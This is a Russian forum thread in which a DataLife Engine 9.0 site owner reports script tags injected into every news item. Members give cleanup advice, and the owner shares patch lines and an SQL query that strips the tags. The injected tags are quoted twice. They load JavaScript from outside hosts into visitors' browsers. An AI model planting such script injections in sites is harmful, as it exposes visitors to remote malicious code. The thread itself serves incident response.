Помощь Взломали сайт

Тема в разделе "DLE", создана пользователем kail.2009, 9 янв 2011.

Информация :
Актуальная версия DataLife Engine 12.0
( Final Release v.12.0 | Скачать DataLife Engine | Скачать 12.0 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.3 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. kail.2009

    kail.2009 Постоялец

    Регистр.:
    26 сен 2009
    Сообщения:
    94
    Симпатии:
    10
    В каждой новости на сайте добавили вот такое вот:
    Код:
    <script src="http://zheenix.msk.ru/37d446615f683577de3c6036925749d5.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script>
    Как можно убрать все эти ссылки? Как найти дырку через которую это зделали ? Версия движка 9.0
     
  2. nullsab

    nullsab Постоялец

    Регистр.:
    5 июн 2007
    Сообщения:
    65
    Симпатии:
    10
    Очень часто ломают через фтп (вирусы тягают сохраненные пароли с total commander и др). Если это так:
    1. Проверить комп на вирусы.
    2. Сменить пароль на фтп.
    3. Заменить файлы на хосте из бекапа (если есть) или выкачать на комп и поиском по файлам найти/удалить строку.
    Как правило поражает index.php, index.html, файлы шаблонов, js файлы, но модификация может быть любая.
     
    kail.2009 нравится это.
  3. kail.2009

    kail.2009 Постоялец

    Регистр.:
    26 сен 2009
    Сообщения:
    94
    Симпатии:
    10
    www

    Дырку вроди закрыл вот так:

    Для исправления откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите:
    Код:
    $count_result = 0;
    ниже добавьте:
    Код:
    $sql_count = "";
    Откройте файл engine/inc/templates.php и найдите:
    Код:
    $allow_save = false;
    ниже добавьте:
    Код:
        $_REQUEST['do_template'] = trim( totranslit($_REQUEST['do_template'], false, false) );
        $_REQUEST['do_language'] = trim( totranslit($_REQUEST['do_language'], false, false) );
    Помогите избавится от кодов в новостя, есть какой нибуть скрипт для массового удаления ?
     
    andre740, ya-maker, Diplom и ещё 1-му нравится это.
  4. shamantc

    shamantc ЗлОй ШаМан

    Заблокирован
    Регистр.:
    3 ноя 2008
    Сообщения:
    651
    Симпатии:
    183
    Если везде код одинаковый который попал в новости то можно попробывать через SQL
    Иначе только ручками
    Хотя в админке DLE помоему есть инструмент поиск и замена посмотри можно и через него сделать
     
  5. kail.2009

    kail.2009 Постоялец

    Регистр.:
    26 сен 2009
    Сообщения:
    94
    Симпатии:
    10
    www

    Код:
    <script src="http://zheenix.msk.ru/37d446615f683577de3c6036925749d5.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script>
    В каждой новости разное вот это значение:
    Код:
    37d446615f683577de3c6036925749d5
    Остольное не меняется
     
  6. kail.2009

    kail.2009 Постоялец

    Регистр.:
    26 сен 2009
    Сообщения:
    94
    Симпатии:
    10
    www

    Убрал все ссылки без труда и за минут 5) Через phpMyAdmin спомощью этого скрипта:
    Код:
    UPDATE dle_post
    SET
    short_story=REPLACE(short_story, '<script src="ссылка" type="text/javascript"></script>', ''),
    `full_story`=REPLACE(full_story, '<script src="ссылка" type="text/javascript"></script>', '')
    WHERE
    `short_story` LIKE '%<script src="ссылка" type="text/javascript"></script>%'
    OR
    `full_story` LIKE '%<script src="ссылка" type="text/javascript"></script>%'
    Подробное описание нашол здесь http://forum.searchengines.ru/showpost.php?p=8316704&postcount=8
     
    DeQuade и o_nix нравится это.
  7. mafiarus

    mafiarus Постоялец

    Регистр.:
    30 июл 2009
    Сообщения:
    78
    Симпатии:
    4
    main.tpl там убери эту строчку и всё
     
  8. danneo

    danneo Честный

    Регистр.:
    13 ноя 2007
    Сообщения:
    1.463
    Симпатии:
    114
    а откуда данные, что это из-за этой дыры?
     
  9. Non-Stop

    Non-Stop

    Регистр.:
    9 июл 2007
    Сообщения:
    347
    Симпатии:
    29
    1)Заменить пароль пользователя mysql
    2)Проверить на наличие новых админов(при наличии удалить)
    3)Изменить пасс к ftp
     
  10. kaskader

    kaskader Постоялец

    Регистр.:
    31 окт 2007
    Сообщения:
    126
    Симпатии:
    33
    У меня такое было, когда вирус на компе пароли все сохраненные потырил.
    Тоесть в тотал-коммандере пароль к фтп был сохранен. Вот через фтп всё заползло.
    Что я сделал. Удалил НОД. Поставил касперский - удалил вирусы, поменял пароль на фтп, почистил скрипты, завел новую аську, никогда больше не сохраняю пароли в операх аськах и коммандере.
     
Статус темы:
Закрыта.